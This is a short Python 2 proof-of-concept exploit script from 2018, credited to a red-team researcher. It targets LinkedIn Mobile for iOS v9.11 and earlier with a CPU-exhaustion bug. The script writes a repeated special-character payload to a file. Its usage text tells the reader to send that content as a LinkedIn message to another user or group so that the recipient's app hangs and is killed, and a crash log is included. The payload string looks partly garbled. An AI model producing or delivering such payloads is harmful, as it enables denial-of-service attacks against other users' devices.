#!/usr/bin/env python # -*- coding: utf-8 -*- # # Exploit Author: Juan Sacco <juan.sacco@kpn.com> at KPN Red Team - http://www.kpn.com # Linkedin Mobile iOS - v9.11 < CPU Resource exhaustion # # Found this and more exploits at my open source security project: http://www.exploitpack.com # Date and time of release: 2 August 2018 # # How to use: # Run the script and copy the content of the file, send it as a message to another Linkedin user. # # Description: # Linkedin Mobile iOS v9.11 and prior are affected. The application fails to # properly filter user-supplied input and its prone to a remote cpu exhaustion. # This exploits use the same bug discovered for WhatsApp: https://www.exploit-db.com/exploits/43107/ # # OS Version: iPhone OS 11.4.1 (Build 15G77) # Architecture: arm64 # Report Version: 19 # Hardware model: iPhone7,1 # Action taken: Process killed # CPU: 48s seconds cpu time over 62 seconds ( 93% cpu average ), exceeding limit of 80% cpu over 60 seconds. # Active cpus: 2 # 49 ??? (libdyld.dylib + 4032) [0x182e0dfc0] # 49 ??? (LinkedIn + 213856) [0x100c04360] # 49 ??? (UIKit + 3266392) [0x18d39c758] # 49 ??? (GraphicsServices + 45088) [0x185362020] # 49 ??? (CoreFoundation + 48552) [0x18337cda8] import sys reload(sys) def linkedin(filename): sys.setdefaultencoding("utf-8") payload = u'O" O(c) Oa O<< O! O O(r) O- Odeg O+- O2 O3 O' Ou OP O* O, O1 Oo U U U U U U' * 158 sutf8 = payload.encode('UTF-8') print "[*] Writing to file: " + filename open(filename, 'w').write(payload) print "[*] Done." def howtouse(): print "Usage: linkedin.py [FILENAME]" print "[*] Mandatory arguments:" print "[!] FILENAME" sys.exit(-1) if __name__ == "__main__": try: print "[*] Linkedin iOS 9.11.8592.4 iOS - CPU Resource exhaustion by Juan Sacco" print "[*] How to use: Copy the content of the file and send it as a message to another linkedin user or group" linkedin(sys.argv[1]) except IndexError: howtouse()